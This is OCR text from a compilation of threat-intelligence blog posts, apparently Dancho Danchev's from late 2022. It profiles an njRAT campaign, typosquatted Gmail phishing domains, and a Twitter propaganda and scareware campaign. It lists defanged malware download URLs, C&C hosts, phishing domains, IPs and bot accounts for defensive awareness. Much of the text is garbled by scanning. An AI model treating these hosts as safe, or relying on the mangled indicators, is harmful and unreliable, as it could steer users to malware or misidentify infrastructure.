3. https://blogger .googleusercontent .com/img/b/R29vZ2x1/AVVXsEjFmhG2EB51LVWpz- y1vQRw3IyVcO7y1Td05d1cXLzPHmmJ— 
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4. https: //blogger .googleusercontent.con/ing//R2Sv221/AVvXsEivV3MV~SONUVLTCB12n00 jxveSirKSAdoPANORANERGOT 
5, https:/ /blogger.googleusercontent. con/ing/>/R2%v22x/AVwXeg@ J6W Bx y26KAGRIKYprCo1?JuaixzePagégVWRUSHL 
6. https: //www. virustotal . com/graph/embed/g198735838d4d4f 798cb99d0f a85543dac97a79158bd34b29a995e8et778c£575 


18.11.51 Massive Malware Serving Campaign Abuses Portmap A Web Based Port 
Forwarding Solution - An Analysis (2022-11-15 04:52) 


[1] [2] 


‘ 


) 


@) @) @ 
® © 


Dear blog readers, 


In this post I’ve decided to further profile a currently circulating malicious software and njRAT 
malware dropping campaign that’s using a popular port forwarding solution as a C &C server 
with the idea to provide everyone with the necessary situational awareness and technical 
details regarding the campaign. 


Sample campaign C &C and associated domains analysis: 


MD5: d8191leee2d99a00cb664d100ffc73b9c 


hxxp://enderop44-36084.portmap.host - 193.161.193.99 
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URL: hxxp://www.cofo.ga/a/KeyOneA.exe 
Botnet C &C: hxxp://cofo.ga - hxxp://52.70.248.161; hxxp://193.161.193.99 


Sample screenshots include: 
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nce that lets you keep in touch with people throug 


xchange of quick, frequent answers to one simple queshon Wha 
Joong? Join today to start recesang scheid1265's tweets 


Hey there! scheid1265 is using 
Twitter. pealreng tal 


scheid1265 


http://xrl.us/bfnrw8 - The word vagina 
just showed up on my Twitter feed, 
not once, but twice. Thanks 
@billboarddotcom and @DJLinje! 


The accounts are relying on identical short URLs, with the following ones still active and in 
circulation: 


tinyurl.com /lyby2r 
tinyurl.com /nx39k8 
tinyurl.com /lyby2r 
tinyurl.com /mnbfox 
tinyurl.com /msjjv8 
tinyurl.com /mj5wju 
tinyurl.com /mxg2vo 
tinyurl.com /m656h7 


tinyurl.com /nffkly 
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Uses publicly accessible Port Forwarding Solution 


MDS; d8191eee2d99a00cb664d 100ffc73b9c 


enderop44-36084.portmap.host 


njRAT Malware Campaign 
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[9] 
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Sample VirusTotal Graph regarding the malicious campaign: 


BQ VTGRAPH + 
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= (Ox on Ip’ 
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® Immediate parent 
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ee sy 
[e})-Comnfagifating files Sole cHionss 
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| 
@ Historic al ssl certificates 
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Explore in VirusTotal Graph 


IFRAME: [12]https://www.virustotal.com/graph/embed/galebb30a63d047be99c7ef691f73506 
189b40cd8dee8466595474163cf01778c 


Stay tuned! 
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SpDyPg3Qd3Sc91llseK4elAYJT_eg5iJjTC7ehGvBPcUL5_X4UFw6cS5 


11. https://blogger .googleusercontent .com/img/b/R29VZ2x1/AVVXsEiFdEjb2I1 j6ykjHYvjQdc3YOXtrfEuGZ-H1BJ_8qRg6hK8 
Oy jK56irFIfvVbNRpO- cTsBS jBnjkULhITKsROEKQ1_E36UUDbGV8sm6 
12. https: //www.virustotal.com/graph/embed/ga1ebb30a63d047be99c7 ef691f73506189b40cd8dee8466595474163cf£01778c 


18.11.52 Data Mining and Visualizing My Old GMail Account - An Analysis 
(2022-11-16 18:38) 
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Dear blog readers, 
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I’ve decided to touch base with everyone and share with you a screenshot which basically 
demonstrates a data mined visualization of my old GMail account where I’m currently using a 
proprietary solution for the purpose of figuring out how different connections with friends and 
colleagues circa 2008-2013 really worked out in terms of achievements and productivity. 


Stay tuned! 


1. https: //blogger.googleusercontent.com/img/b/R29vZ2x1/AVVXsEg52MC4vumviRg2cEyu_WqG4B7WiVZKgRqwBtgbHQ8NSUbNm 
Ow1wIZ6QAQ4HBGRw1iRugvAkpqS90GoSDqgBg6zTWS8xALC9OYR507HX 


18.11.53 Sample Photos from My Cyber Security Talks Bulgaria Presentation - An 
Analysis (2022-11-16 18:38) 


[1] 
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Dear blog readers, 


I’ve decided to share some personal photos from my [2]Cyber Security Talks Bulgaria presenta- 
tion which is quite an outstanding event with quite some interesting and good audience where 
| had the privilege and meet and socialize with fellow researchers and experts and make an 
outstanding presentation. 


Sample photos include: 


CYBER SECURITY TALKS BULGARIA 


DDOS ATTACKS - BIGGER! STRONGER! AND MORE ELUSIVE! 


DANCHO DANCHEV 


EXPERT IN THE FIELD OF CYBERCRIME FIGHTING AND THREAT INTELLIGENCE 


TUESDAY NOVEMBER 8 | 19:00 EEST 


AT 
stanga @ 


SHARE TO PROTECT 
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xrl.us /bfnpv7 
xrl.us /bfnsa8 
xrl.us /bfny8e 
xrl.us /bfnnu4 
xrl.us /bfnzkk 
a.gd/ 6af3fe 
a.gd/ 649be 
a.gd/ f6b7f5 
a.gd/ Oabe74 
is.gd/ 3AoRZ 
is.gd/ 3A5DD 
is.gd/ 3AUVc 
is.gd/ 3BZqa 


is.gd/ 3C41U 
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[8] 


9p6aTa c KUOepnpectsnHoctTtTa, U3BeCTeH OLE KATO 
SbnrapcKuat Ku6ep-Xonmc". 


[9] 
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[10] 


— 19:55 - 20:25 - An Introduction to the World of Cybercrime OSINT and Threat Intelligence Gathering 


Dancho Danchev 
Expert in the field of cybercrime fighting and threat intelligence gathering 


[11] 
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ve 


Johnathan Azaria Dancho Danchev 


Sample presentation slides include: 
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Table of Contents 


[14] 


Who Am |? 


[15] 
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Cyber Jihad vs Cyberterronsm — Separating Hype 
from Reality 


Dancno Danchev 


Cybercrime Researcher, Security Blogger at ZDNet, 
Security Blogger at Webroot Inc 


Contact Details: a 
Email: a 
dancho.danchev@hush.com 


[16] 
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Contact Details: 
Email: 
dancho.danchev@hush.com ~~ 
[18] 


News Articles Referencing My Research During 201¢ 


Contact Details: 
Email: 
dancho.danchev@hush.com 
[19] 


Contact Details: 
Email; 
dancho.danchev@hush.com 
[20] 


Contact Details: 
Email; 
dancho.danchev@hush.com 
[21] 
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Danchev is an expert in the field of cybercrime fighting and 
ence gathering having actively pioneered his own methodology for 
ocessing threat intelligence leading to a successful set ofhundreds of 

ality analysis and research articles published at the industry's 
leading threat intelligence blog- ZDNet's Zero Day, Dancho Danchevs 
Mind Streams of Information Security Knowledge and Webroot's 
ThreatBlog with his research featured in Techmeme, ZDNet, CNN, 
PCWorld, SCMagazine, The Register, NYTimes,CNET, ComputerWorld, 
H+Magazine currently producing threat intelligence at the industry's 
leading threat intelligence blog - Dancho Danchev's - Mind Streams of 
information Security Knowledge which has received over 5.6M page 
‘views since December, 2005 and is currently considered one of the 
security industry's most popular security publications. 


[22] 


“What use are they? 
people over there reading newspapers” 


—President Nixon on the CIA 
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Problems That This Presentation Solves 


Expert Leader 
"Daily coordination of “International 
cyber attack analysis dominance over cyber 

ond take down ottack exposure ond 
activities” attribution” 


“Making Impact on A Daily Basis Sin 
The Early Days of Humankind” 
https://ddanchev.blogspo t.com 
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ho is Dancho Danchev? 


ed in Techmeme, ZDNet, 
PCWorld, SCMagazine, One of the most prominent one- 


orld, H+Magazine 
is OSINT? 
that can be found has 
been found somewhere ret 
GCHQ Government Program 
“Lovely Horse” to monitor hackers 
[26] 


What is OSINT (Open Source Intelligence)? 


[27] 


HTTP imagination-1.com /?uid=138&pid=3ettl=b1d¢e571b16 525 text/html 
HTTP my-systemscan.com  /?p=WKmimHVla3GHjsblo22EhHY8ipny¥bWeMn... 1,780 text/html 
HTTP my-systemscan.com /Images/loading. gif 0 

HTTP miy temscan.com /Scripts/Strategies/7a06b79cdbO03ad¢ed1394b... 0 

HTTP miy temscan.com /Layouts/Landings/CentralLandings/7 fimages/|... 0 

HTTP miy temscan.com jLayouts/Landings/CentralLandings/7/images/|... 0 

HTTP miy temscan.com jLayouts/Landings/CentralLandings/7/images/|... 0 

HTTP my temscan.com /Layouts/Landings/CentralLandings/7/images/|... 0 

HTTP my-systemscan.com fLayouts/Landings/CentralLandings/6/images/|... 0 

HTTP my-systemscan.com  /build?_138.php?cmd=getFile&counter=02p=.., 0 application/... 
HTTP my-systemscan.com  /build?_138.php?cmd=getFile&counter=1&p=.,.. 0 application/... 
HTTP my-systemscan.com  /build?_138.php?cmd=getFile&counter=2&p=.., 0 application/... 
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text/html 


text/html 


HTTP imagination-1.com /?uid=138&pid=3ettl=b1d4¢e571b16 527 — text/html 
HTTP my-systemscan.com /?p=WKmimHVla3GHjsblo22EhHY8ipny¥bWaMn... 1,780 — text/htrl 
HTTP my-systemscan.com /Images/loading. gif 0 

HTTP my-systemscan.com /Scripts/Strategies/6ad65F29d4977407cc968c... 17,203  textfjavasc... 
HTTP my-systemscan.com fLayouts/Landings/CentralLandings/6/images/l... 32,352 image/gif 
HTTP miy temscan.com /Layouts/Landings/CentralLandings/6/images/|... 0 

HTTP my temscan.com fLayouts/Landings/CentralLandings/6j/images/|... 22,127 = imaqge/aif 
HTTP ystemscan.com fLayouts/Landings/CentralLandings/6/images/|... 739 image/gif 


The short URLs rely on several redirectors to finally land the end user on a scareware site, 
such as securityland .cn and imagination-1 .com: 


securityland .cn - 64.86.25.201 - Email: keithdgetz@gmail.com. Parked on the same IP 


are also: 

abcliilab .com 

Olenfo .com 

ynoubfa .cn 
protectinstructor .cn 
immitations-all .net 
llimbo .net 


imagination-1 .com- 64.86.25.202 - Email: Parked on 


the same IP are also: 


gertrudeedickens@text2re.com. 


bombas10 .com 


graves111 .com 
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What is Threat Intelligence? 
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for Achieving Success in the World of Cybercrime Fi 
Threat Intelligence 


Tactical Framework 
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Bo) | Thank you for your time and attention! 
™ 


_ 


Can Pas Dare Ney 8 hay Ulral Deere of mhie rede te we By Brevetenbye 


* 2,572,020 views « 1008» 
* 6,497,440 ClICKS mm 


https://ddanchev.blogspot.com 
Email: 
dancho.danchev@hush.com 


Stay tuned! 
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oUWwjktcgziWbXxs2warT/7z3c jR8JnLO3CL1PqJXwox23IoNbY0zC9d 
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28. https://blogger.googleusercontent .com/img/b/R29vZ2x1/AVvXsEhhnYw5MRMSiNAUB52nLI_ifxV4dbe_eUi_Ns9VsjYGOit 
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18.11.54 Profiling a Typosquatted Google’s Gmail Targeted Phishing Campaign Do- 
main Portfolio - An OSINT Analysis (2022-11-29 18:38) 
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194.58.113.14 


© © 


myaccount-profile-mail.ru 


OF @) 
~s “s 
www.myaccountsid-mail.ru myaccountsid-mail.r 


NOTE: 


The majority of these typosquatted phishing domains which are also known to have been used 
in targeted phishing campaigns are known to have been part of the [2]Void Balaur hacking for 
hire vendor of services. 


I’ve decided to share with everyone a recently discovered using OSINT typosquatted phishing 
domains portfolio which appears to have been widely used in a variety of targeted phishing 
campaigns. 


Sample domains known to have been involved in the campaign include: 


hxxp://my-mail-account-gmail.com 
hxxp://security-myaccount-goglemail.com 
hxxp://myaccount-mail-my-gmail.com 
hxxp://account-mail-my-gmail.com 
hxxp://cloud-accounts-goglemail.com 
hxxp://my-account-security-goglemail.com 
hxxp://mail-yahoo-myaccounts.com 
hxxp://mail-yahoo-myaccount.com 
hxxp://account-disk-gmail.com 
hxxp://my-mail-accounts-gmail.com 
hxxp://accounts-mail-my-gmail.com 
hxxp://mail-my-accounts-gmail.com 


hxxp://myaccount-mail-goglemail.com 
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hxxp://accounts-oauth-gmail.com 
hxxp://account-oauth-gmail.com 
hxxp://account-my-mail-gmail.com 
hxxp://mail-myaccounts-gmail.com 
hxxp://accounts-mail-goglemail.com 
hxxp://mail-myaccount-yahoo.com 
hxxp://mail-my-account-gmail.com 
hxxp://security-accounts-goglemail.com 
hxxp://my-signin-accounts-gmail.com 
hxxp://my-signin-account-gmail.com 
hxxp://my-oauth-account-gmail.com 
hxxp://security-myaccounts-goglemail.com 
hxxp://security-my-account-goglemail.com 
hxxp://my-security-goglemail.com 
hxxp://myaccounts-gmail.com 
hxxp://myaccounts-mail-gmail.com 
hxxp://accounts-my-mail-gmail.com 
hxxp://myaccounts-mail-my-gmail.com 
hxxp://my-mail-account-yahoo.com 
hxxp://security-my-goglemail.com 
hxxp://myaccount-my-mail-gmail.com 
hxxp://myaccounts-my-mail-gmail.com 
hxxp://cloud-myaccount-goglemail.com 
hxxp://my-mail-yahoo-accounts.com 
hxxp://mail-yahoo-my-account.com 
hxxp://mail-myaccount.com 
hxxp://myaccounts-mail-yahoo.com 
hxxp://my-mail-gmail.com 
hxxp://security-my-accounts-goglemail.com 
hxxp://mail-accounts-my-gmail.com 
hxxp://yahoo-oauth-accounts.com 


hxxp://mysecurity-goglemail.com 


Sample responding IPs known to have been participating in the campaign include: 


185.246.130.170 
194.67.71.102 
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5.188.206.201 
194.58.56.56 
194.67.71.197 
194.58.56.34 
195.3.144.231 
194.67.71.61 
195.3.146.111 
195.3.146.100 
194.67.71.142 
194.67.71.44 
54.241.4.132 
195.186.210.241 
194.67.71.189 
194.67.71.137 
194.67.71.3 
194.67.71.25 
193.105.134.29 
194.58.112.169 
194.67.71.160 
194.67.71.35 
194.67.71.17 
194.67.71.158 
194.67.71.99 
194.67.71.123 
195.3.146.94 
194.58.112.174 
95.173.132.1 
194.67.71.173 
195.3.146.106 
185.246.130.165 
194.58.112.172 
195.3.146.90 
99.83.178.7 
194.67.71.105 
185.246.130.162 
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194.67.71.162 
194.67.71.47 
194.67.71.175 
75.2.110.227 
194.67.71.40 
194.58.113.13 
194.58.112.170 
194.67.71.118 
194.67.71.177 
195.3.146.99 
195.186.208.193 
194.58.113.14 
194.67.71.73 


Stay tuned! 


1. https: //blogger .googleusercontent .com/img/b/R29vZ2x1/AVVXsEi82zmntEoaT_Uue5kf6G-_dWJXShEbSOkxPg9JqcZzLtAI 
s JIxCmFUicGo5x_HDF7-JculaZLvzOvm51cRv62At2xXSG_T_Q_VzYD 


2. https://documents.trendmicro.com/assets/white_papers/wp-void-balaur-tracking-a-cybermercenarys-activities. 


pdf 


18.12 December 


18.12.1 Exposing a Massive Anti-NSA Chinese Themed Online Influence and Propa- 
ganda Campaign - An OSINT Analysis (2022-12-04 03:33) 


[1] 
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China loves the U.S and guess what? Based on my most recent analysis on online influence 
and Chinese themed propaganda campaigns I’ve just intercepted a what appears to be a live 
Chinese-themed online influence and propaganda campaign targeting the NSA including the 
U.S mass surveillance campaigns internationally including the active use of variety of tags and 
automatically registered Twitter accounts. 


Although many of the accounts appear to be currently suspended the earliest tweets part of the 
campaign date back to July, 2022 and the campaign appears to be currently and still ongoing. 


Let’s take a deeper look inside the campaign using both publicly obtainable and accessible 
Twitter analytics tools including various OSINT techniques and try to shed as much light 
into the campaign as possible including to actually attempt to offer as much actionable 
intelligence on the actual Twitter accounts in use including the actual list of rogue and bogus 
and automatically registered Twitter accounts known to have been involved in the campaign. 


Sample screenshots and images part of the campaign include: 
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—EAIRGR, GAWUBRIDEARMETRASE, ish 
BRN, HBBSNTRERTEMEA. Be 
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RBA-RGA“ZA"H 

. “SERR" CRRARD 

PALRELARAFT, REF 

RARSARERASR 

ABSRX,. MSRK, E 

ERURR. RESHRRARSE. LRAEK 

S-828. 88, CRRASHERAE 
ABXAERE. 


BATRES 
dj] (RORRRREKSDERAR) 


Eix.e 


eat aes eens 
, RARERZAL 
ance, FPRRARS aS 
SeRM, BURAER, ye 
SHARFLARBS 


RREXARTRR, 

BATRES 
(AORSRMRBATEXD : 
| s. raat mR 


Xs 
RAARPRRER, 2 
RERREFRORH, 
Le we FRRARAPRARR 


BR. TAK. SRES 
Bt, AtRaREH AH 
— | REQM. 


f HATES 
74 (ROHRGRKE MARA) 


[3] 


[4] 
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iriskas .com 


yvicawo .cn 


Where do we know the gertrudeedickens@text2re.com email from? Several of the scareware 
domains pushed in the [10]ongoing U.S Federal Forms Themed Blackhat SEO Campaign have 
been registered using it, that very same blackhat SEO whose central redirector a-n-d-the 
.com/wtr/router.php - 95.168.177.35 - and in-t-h-e.cn - 72.21.41.198 - (hosted by Layered 
Technologies, Inc.) mimics the campaign structure of 2008’s [11]massive input validation 
abuse attack using iFrames, courtesy of the RBN and the very first scareware campaigns. 


Moreover, the same email has been used to register two of the "phone-back" domains 
for the scareware pushed in the blackhat SEO campaign and the [12]NYTimes.com malver- 
tising attack - windowsprotection-suite .net - Email: gertrudeedickens@text2re.com and 
securemysystem .net - Email: gertrudeedickens@text2re.com. 
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cyber securit 


The Matrix 
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[12] 
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# Top hashtags 
frequency 


ReTweet 


ME Tce: 


10 


japt4t 


ea 


10 


*RE RABIN 
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¢ 
& 
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© Title 1730588 
SOth, SRENUARRHRASRANH? SREMSSSOE LOU? SREMHSHRAS HSS? Bee! 
Bo, + OR eaR eae APs 

@ Tira Turb2522686 
SOUR, SRGHARSHRRLIEASKH? SRERSESPOS!—-HNGMG? SRERHSERSLHSS? Bee! 
PQ, #ORERBIR #ORAPTAT 

© Barbora 12644897 

ff Hi SOUF, SRGNARBHRRASRANS? REHASH —NPMS? PREM SEMAlHes? Bee! 

gay (Se PMMA ose ArTst 

@Keryw61031618 
SOUR, SRENARSHRLIEBARLH? SRERSSPOS +O? SREROSERSSHS2? Sem! 
(2, eR RBI eEAPT AY 

@Karmahts00514763 
SOF, SCNARAHRRASRANS? RERALSO lM? SEM SERAlHes? Bee! 
2, ese Mariah ese (Arts 


@PntwGies 


December 1, 2022 11219m W 


“APTA RE MA SS 


December 1, 2022 11219m W 


“APT41 REMMI ) Gee 


December 1, 2022 11:20PM W 


“APTA ERB MMS BS 


December 1, 2022 11:199m W 


“APTS1 RE MDMSA MAF 


December 1, 2022 11:199M WF 


“APTA1 RE MEMS BS 


December 1, 2022 5.02 Pm 


) MERALEKSS CSUR, RCA AR, ARRISHRGHECK. BUMMASHR, BeBSHRRCS WATT 
B, RFRA OOPEAHABTAHSEAR. 


[15] 
& Most Active 
Nr Tweet Sent 
e) @prittgiles 
1 @lesliew50325118 
& @wandarh62784000 
& @annegro60391042 
wy @dazhonghua12 
a5 @wuhuaizaiwuhu 
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@ Gbritneyzucker le ohara12644897 


@kimberl7002566@annegrp6039 1042 ° 
e ® jennife34680666 
hilipc176 i6103161 karenma/1598490 
@philipc1766@&kBlyw 


@ @zacbaosg 


miagra saad 
Tron Qu9700145 este 5032511 arlagoue 107654 
@ark999 
+ @valeriegaletty 


ewa9e0ed 459 
@tiffany91739588 @karmaha00514763 
@ @boxun christi02442184 O 


tinatur62522686 
© @tanyajo77877466 pridget14179557 ‘si 


ijlennywo/6647769 ‘ nis i 


oO 
jinn 360644 lerie01869391 
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The following scareware domains are not just used within the Twitter campaign, some of them 
have also been detected as part of blackhat SEO campaigns: 


ekevuc .cn - 64.213.140.68 
windowspcdefender .com 
smart-virus-eliminator .com 
fast-systemguard .net 
opyhila .cn 


riwryse .cn 
2639 


HD 23 38M 


Sample list of Twitter accounts known to have been involved in the campaign include: 


hxxp://twitter.com/StaceyK36144742 
hxxp://twitter.com/BritneyZuckerl 
hxxp://twitter.com/Bridget14179557 
hxxp://twitter.com/BrendaJ34299681 
hxxp://twitter.com/ShellyC73046280 
hxxp://twitter.com/LilyMor32206911 
hxxp://twitter.com/Crystal19281620 
hxxp://twitter.com/Isisjoh51245470 
hxxp://twitter.com/SonyaBr21397587 
hxxp://twitter.com/LolaBac41731968 
hxxp://twitter.com/LilyMor32206911 
hxxp://twitter.com/BritneyZuckerl 
hxxp://twitter.com/Bridget14179557 
hxxp://twitter.com/BrendaJ34299681 
hxxp://twitter.com/ShellyC73046280 
hxxp://twitter.com/BrendaK17065575 
hxxp://twitter.com/Crystal19281620 
hxxp://twitter.com/SonyaBr21397587 


#=Elapt41 
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hxxp://twitter.com/LolaBac41731968 
hxxp://twitter.com/SonyaBr21397587 
hxxp://twitter.com/DeannaBenford1 
hxxp://twitter.com/BritneyZucker1 
hxxp://twitter.com/Bridget14179557 
hxxp://twitter.com/BrendaJ34299681 
hxxp://twitter.com/ShellyC73046280 
hxxp://twitter.com/BrendaK17065575 
hxxp://twitter.com/Crystal19281620 
hxxp://twitter.com/Isisjoh51245470 
hxxp://twitter.com/LolaBac41731968 
hxxp://twitter.com/LolaBac41731968 
hxxp://twitter.com/LilyMor32206911 
hxxp://twitter.com/DeannaBenford1 
hxxp://twitter.com/EmilyShatwell4 
hxxp://twitter.com/BritneyZuckerl 
hxxp://twitter.com/Bridget14179557 
hxxp://twitter.com/BrendaJ34299681 
hxxp://twitter.com/ShellyC73046280 
hxxp://twitter.com/BrendaK17065575 
hxxp://twitter.com/Crystal19281620 
hxxp://twitter.com/LolaBac41731968 
hxxp://twitter.com/LolaBac41731968 
hxxp://twitter.com/TemperanceVini9 
hxxp://twitter.com/EmilyShatwell4 
hxxp://twitter.com/BritneyZucker1 
hxxp://twitter.com/BritneyZuckerl1 
hxxp://twitter.com/Bridget14179557 
hxxp://twitter.com/BrendaJ34299681 
hxxp://twitter.com/ShellyC73046280 
hxxp://twitter.com/BrendaK17065575 
hxxp://twitter.com/Crystal19281620 
Stay tuned! 


1. https://blogger . googleusercontent . com/img/b/R29vZ2x1/AVVXsEg2r6oscU jb2ziXcAdm70jbT-QWYRUez-rcap3xX1meUhDiB 


zZz3kT7dVOdLOftWnz1ixUVccfZLzZUNaGrzyA67KGEV95H25-Sa2kUCD 
2. https: //blogger . googleusercontent .com/img/b/R29vZ2x1/AVvXsEhCuDrWXqt js43YEZqNPOw1A5qFUVp2XotHk43M4qGP_167 


26364 


rEAPZxmVRRa_1MPQVrhbhLm1QMXKU4QSTw4htr YROEYWVhy JLtmD 
ttps://blogger .googleusercontent .com/img/b/R29VZ2x1/AVvXsEg1TzQ1khBiQ920Gm5-hVmrvZ5uUZ9bks1cEYsOZuxNT1xW 


_ 


st) 
N 
6 
< 
< 
Ww 
B 
n 
ps 
H 
(sz) 
Q 
b 
B 
cor | 
Q 
° 
os) 
ct 
oO 
ps 
(o>) 
=} 
ol 
= 
“J 
< 
B 
A 
G 
oO 
Oo 
B 
a 
S 
be 
w 
o1 
= 
cael 
i= 
= 
tH 
H 
wo 
Pad 
iS 
oO 
Pod 
o 


ttps://blogger .googleusercontent .com/img/b/R29VZ2x1/AVVXsEi3FoPT_syv2W- ykyFXH594T1FnnFCMzy5P9j_NNFbCK1Nw 


> 


N 
SG 
H 
° 
3° 
q 
8 
° 
= 
a 
Q 
09 
faa 
Hh 
2 
00 
B 
a 
~ 
ct 
w 
oO 
es 
tad 
oq 
fe) 
tee} 
ay 
oO 
H 
n 
fe) 
7 
AN 
ion 
Fh 
G 
= 
= 
= 
3 
a 
os 
5 
= 
a) 
B 
n 
H 
=] 


ul 


ttps://blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEjuDNYmcqtf21D6LpOGPIMxZaTBgSEXC-sqBxwGmW9wiqkt 
6Ymsinm96_mOeFVfKt_7G8yYR5yqabWu9MilYLzweN_q98BNysn9d 
ttps://blogger. googleusercontent .com/img/b/R29VZ2x1/AVvXsEgb7iwecc45ZUFKX j6eWf 7LsbUsk- Ro j -UKuA9C5 j03FoMI 


(o>) 
oO - . 
H 
q 
Q 
re 
4 
as] 
EB 
=e) 
ad 
p=) 
NI 
oi 
n 
ps 
H 
Hy 
Q 
° 
S< 
iS 
N 
as) 
09 
~ 
z 
SG 
fo.) 
fe} 
H 
p=) 
o> 
“I 
Q 
j=) 
p=) 
B 
ira) 
> 
S 
og 
oi 
uel 
oi 
=] 
A 
a 


~N 


ttps://blogger . googleusercontent .com/img/b/R29vZ2x1/AVvXsEgd0gcThJv--RinqQOf et XX4whIUFlyfiU_vJskCCcibSvf 
A7VO4pSoTuHYoR/ryUcwz3yc8m5IBxcmco72PJKSygn9K15dzO0hEP 
ttps://blogger .googleusercontent .com/img/b/R29VZ2x1/AVvXsEiPgkzLoVnN1Di9b1BL5NfnDaOH8FCSZJS jMk9QNg3exAkZ4 


H 


A | 00 
wm] - 
= 
uc] 
ion 
ps 
yr 
Bp. 
=F 
NI 
x 
N 
Corl 
x 
B 
a 
oO 
A 
log 
Q 
o 
ion 
= 
f=") 
Hy 
(e] 
fad 
fan) 
n 
ue) 
rare 
=F 
= 
iS 
Qa 
wo 
ra 
ol 
Ni 
rs 
oO 
i) 
N 
oO 
a 
@ 
(0) 
< 
Hh 
0 
~ 
C7] 


ttps://blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEgRL2M_BMoNGkE96_JBBtgd9 jhOk0922Y2F Ji AttFtu3MITj 
E--_Gu99hkahxn6Z3kaYiWxmiFnt34nc-8nYvZZoEF j yb 

0. = 
x_OBbh9ONmwINEFbOL8Xg0xdGESOvhBr4-Oluz5pUtcxGgs6rZJLP- XH 
11. 
Rr08-rUs8zyegMv6su/7EzTDHtJi901-XCZc8P-rvLRBIaTmdLKMnT-Rj 
12. https://blogger.googleusercontent . com/img/b/R29vZ2x1/AVvXsEgGDYNmDq631m2CsFUUCzi yqx9c_O0h_DWq9QDIqZEb8K 

kSOXVY3NqSLTWHc3MSevLCcdODwF trBHxXgz3ix52fkKKosofpE147Qux 


o 
nn - 
° 
“NJ 
a 
a 

=) 


ct 
ct 
uc] 
n 
N 
N 
ion 
# 
fe) 
0g 
09 
o 
5 
09 
fo) 
fe} 
(te) 
H 
@ 
(= 
n 
oO 
4 
Q 
° 
(=) 
ct 
o 
B 
ct 
fa) 
°° 
B 
— 
Ee 
=} 
(ie) 
SN 
lon 
a 
P-] 
N 
oO 
<q 
N 
NO 
tal 
H 
~ 
> 
< 
<q 
asl 
n 
fH 
Be 
ct 
n 
2 
q 
rer 
Q 
N 
09 
[=} 
ion 
Fh 
H 
oO 
=] 
> 
n 
5 
q 
(op) 
NO 
o 
Qa 
Q 
< 
2 
H 
tal 
P 
© 
i=] 
oq 
=F 
< 
< 
Qa 
oO 
Fh 
y 
ct 
Oo 


ct 
ct 
uel 
n 
N 
N 
ion 
B 
fe} 
(ee) 
0a 
0) 
5 
09 
fo) 
fe) 
0a 
a 
@ 
i= 
n 
© 
8 
fa 
le) 
=] 
ct 
© 
=! 
ct 
a 
° 
=} 
NX 
H 
=} 
0a 
N 
jon 
N 
Ee) 
N 
oO 
< 
N 
N 
tal 
ian 
N 
> 
< 
< 
ps 
n 
52) 
0a 
ui 
Kh 
Ww 
ral 
H 
a 
<4 
= 
ina 
=) 
< 
Bh 
=} 
< 
oO 
p 
ion 
Fh 
eat 
iw] 
o 
qQ 
ct 
09 
[= 
fo 
= 
a 
= 
ion 
iw 
Qa 
NI 
N 
= 
Q 
ry 
ol 
< 
i= 
® 


13 
v4. 
d5KIzxtUum8 jRV8BbCj LYnzAVTZohZgLz3uuEDm j XTGnMzYSCZKo-wj 

15. https://blogger.googleusercontent .com/img/b/R29VZ2x1/AVVXsEiqRE43uKuFVJR-v3Q1ajcVihyy8arkK7Nd1ZRolP6SVKmm 


FIqRC__bXM-CEfdjY7Kt8sLjhJBOt6A8-LgYNJq-BNE-tTREFy0QUcoHo 

16. https://blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEhj_OauMQ_Vz9nemd0Jm3QYKIF3Hs1S1YXdw2erjJeLwI 
-OmAuD_8DWLQjhvAPFbdH2P7SD1Lzh4_7Kw4-6q3rpAXjDG1bOqAsk 

17. 


NJ 
I 
iy 
Q |= 
ct 
Bg 
ait 
‘es — 
ols 
ca |e 
oO 
6B 09 
Bh |/09 
a || @ 
wl) 
& |/ca 
a|}o 
Fh || oO 
oO |03 
B® 
o 
b 
iis 
aio 
| O 
fy |) B 
ES | ct 
o 2 
aie 
mc 
ane 
oie 
,a |B 
oS 
tr 
oO |S 
o | 
aS 
ais 
~N 
alls 
30 
o|}s 
mis 
Sais 
H 
N 
> 
= 
dq 
acl 
a 
ea) 
ut. 
we) 
NI 
[aa 
oO 
H 
oO 
i= 
i= 
ma 
w 
y 
an 
ie) 
~~ 
oO 
K 
gi 
3 
i= 
° 
y 
H 
id 
> 
Bb 
ze 
bp’ 
° 
Ye) 
: 
° 
ee] 
N 
B 
N 
ue) 
ima 
ct 
be 
00 


= 
fos] 
= 
Ny 
Ny 
=< 
iy) 
xo) 
xo) 
< 
x 
= 
2 
iY) 
< 
me 
N 
(=) 
N 
i 
= 
- 
°o 
ul 
=) 
= 
ul 
= 


he 


[1] 


26365 


Dear blog readers, 


It’s been a while since I’ve last posted a high-quality personal message on my personal blog 
but the first thing that | wanted to say is big thanks to everyone who’s been following and is 
following me and continues to follow me and read my research here where the pleasure to 
produce high-quality and never-discussed and published before research is all mine and will 
continue to be. 


What I’ve been up to? I’ve been basically multi-tasking on several fronts which I’m doing 
my best to continue fighting the good fight in terms of fighting and responding to the latest 
underground ecosystem cybercrime-friendly market propositions by actually profiling them and 
making sure that my research and analysis reaches all the appropriate parties that also includes 
the general public. 


In terms of work I’m currently acting as a DNS Threat Researcher at WhoisXML API where the 
pleasure to personally thank the team and the CEO for bringing me on board is all mine where 
my primary responsibilities include the production of white papers on the topic of cybercrime 
and general cybercrime and threat actor type of research. 


Some of my current projects include: 


[2 ]https://disruptive-individuals.com 

¢ [3]https://offensive-warfare.com 

¢ [4]https://cybercrime-forum-dataset.org 
¢ [5]https://osint-marketplace.org 


¢ [6]https://unit-123.org 
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I’ve also recently updated the BIO on my Twitter and LinkedIn accounts and I’ve been also 
pretty active on Facebook and Mastodon including Xakep.bg’s Discord server where | recently 
held a presentation at Cyber Security Talks Bulgaria and I'll soon feature the actual photos and 
video from the event. I’ve also recently claimed my Google Knowledge Panel and believe it or 
not Google thinks that I’m a researcher which is great news and I’m honored to also have my 
Twitter and LinkedIn accounts featured on the front page so thanks a lot for reading me and for 
visiting my blog including to read my research. 


Stay tuned! 


1. https: //blogger .googleusercontent .com/img/b/R29vZ2x1/AVVXsEhTAw3J_KhJ3Kx4f 9JK8zwPBeyBfKWe8nF OOSwOCDFDK1W5X 
3yU8FWyMngEtoe8A9TEAysqyMzzt Jds2EbH5X902GiSarLsAQrFtuZ 


https://osint-marketplace.org/ 


2. 
3. 
4. https: //cybercrime-forum-dataset.org/ 
5. 
6. 


18.12.3 Happy Holidays From The (Not) Republic of Bulgaria - An Analysis 
(2022-12-06 21:52) 


Period. 

